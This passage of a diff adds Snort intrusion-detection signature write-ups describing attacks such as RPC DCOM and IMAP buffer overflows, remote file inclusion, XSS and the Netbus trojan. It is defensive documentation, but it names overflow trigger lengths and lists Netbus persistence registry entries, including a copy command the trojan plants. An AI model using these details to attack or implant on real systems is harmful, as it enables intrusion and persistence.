+Simple. The worm does all the distribution work.
+
+--
+False Positives:
+E-Mail that contains the body "Software provide by [MATRiX]"
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Symantec W95.MTX removal tool: http://www.sarc.com/avcenter/venc/data/w95.mtx.fix.tool.html
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1275.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1275
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) yppasswd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port yppasswd is using.  Attackers can also learn what versions of the yppasswd protocol are accepted by yppasswd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as yppasswd run.  The yppasswd RPC service handles password change requests from the program yppasswd.  This program is used to change a user password in Network Information Service (NIS) environments where a centralized database exists to distribute passwords throughout a network.  Multiple vulnerabilities are associated with the yppasswd RPC program.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where yppasswd runs.  This may be a precursor to querying yppasswd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access yppasswd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for yppasswd, not probes of the yppasswd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the yppasswd service itself. An attacker may attempt to go directly to the yppasswd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS14
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000517.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000517
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "e107" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "ep" parameter in the "search.php" script used 
+by the "e107" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using e107
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2077.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2077
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Momabo Site Server.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
--- /dev/null
+++ b/doc/signatures/110.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+110
+
+--
+Summary:
+Netbus is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine. This Trojan also has the ability to scan machines and networks for open ports, it can also redirect legitimate traffic to other destinations. It can turn the infected host into an open proxy server.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Netbus sever to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	109	netbus active (outgoing TCP connection)
+	110	netbus getinfo (incoming TCP connection)
+	115	netbus active (outgoing TCP connection)
+
+Server ports usually opened may be one of the following depending on the version of netbus: 12345, 12346, 20034
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+The manual removal of this Trojan should only be attempted by an experienced Windows system administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+
+Registry keys added include:
+
+	Netbus Server Pro
+	PATCH "C:\windows\patch.exe /nomsg" - note: the entry may not necessarily be called PATCH
+	NetBuster = ""
+	SysCopy = "command /c copy %windir%\\keyhook.dl_ %windir%\\*.dll /Y"
+	Rundll32 = "rundll.dl_ /noadd"
+	Rundll = "regedit /s nbsetup2.reg"
+
+Later versions may also add one of these registry entries:
+
+	HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/
+	HKEY_CURRENT_USER/NetBus Server/
+
+These entries should be deleted.
+
+The files rundll.dl_ (note the underscore, this is important) and nbsetup2.reg should be deleted if they exist.
+
+Ending the process is necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS401
+http://www.whitehats.com/info/IDS403
+
+Hackfix.org
+http://www.hackfix.org/netbusfix/index.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/netbus/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000674.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000674
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "footer.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "footer.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/374.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+374
+
+--
+
+Summary:
+This event is generated when an ICMP echo request is made from a MacIntosh host running IPNetMonitor.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a MacIntosh host running IPNetMonitor contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS157
+
+--
--- /dev/null
+++ b/doc/signatures/2442.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2442
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Apple Quicktime/Darwin Streaming Server.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+The Apple Quicktime Streaming Server is used to serve client machines
+with streaming media content using TCP/IP. A vulnerability exists in the
+processing of client requests that can cause a DoS.
+
+An overly long User-Agent field in DESCRIBE requests to the server can
+cause this condition to occur.
+
+--
+Affected Systems:
+	Apple Darwin Streaming Server 4.1.3
+	Apple Quicktime Streaming Server 4.1.3
+
+--
+Attack Scenarios:
+An attacker can supply a user agent field in excess of 255 characters in
+a DESCRIBE request to trigger the DoS condition.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1307.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1307
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2830.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2830
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repgroup
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2955.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2955
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3276.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3276
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1802.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1802
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1790.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1790
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/100000441.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000441
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Wikiwig" application running on a webserver. Access to the file "wk_lang.php" using a remote file being passed as the "WK[wkpath]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "WK[wkpath]" parameter in the "wk_lang.php" script used by the "Wikiwig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Wikiwig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2246.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2246
+
+--
+Summary:
+This event is generated when an attempt is made to access Webadmin from 
+a source external to the protected network.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+WebAdmin is a web application that allows remote administration of 
+MDaemon and RelayFax. A vulnerability exists such that the URI used by 
+WebAdmin discloses the installation location of MDaemon and RelayFax. A 
+URI can also be crafted by an attacker that would allow the reading of 
+any file on the system. This information might then be used in further 
+attacks against the host.
+
+--
+Affected Systems:
+	WebAdmin prior to 2.0.3
+
+--
+Attack Scenarios:
+The attacker needs to login to the server as an administrator then use 
+WebAdmin.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq archive:
+http://www.securityfocus.com/archive/1/319735
+
+--
--- /dev/null
+++ b/doc/signatures/1552.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1552
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/106-2.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+106-2
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically multiple
+records in one packet were detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/422.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+422
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Reply datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Mobile Registration Reply were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 36 datagrams with an ICMP Code other than 0, should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Reply datagrams were developed before the approval of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 36 datagrams with undefined ICMP Codes are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3067.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+3067
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"examine" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+In the case of Ipswitch IMail, an overly long mailbox name supplied as a
+parameter to the examine command may be a trigger condition of a buffer
+overflow. A name of 259 bytes or more may cause this to occur.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+	Ipswitch IMail 8.1.3
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3107.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3107
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3290.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3290
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
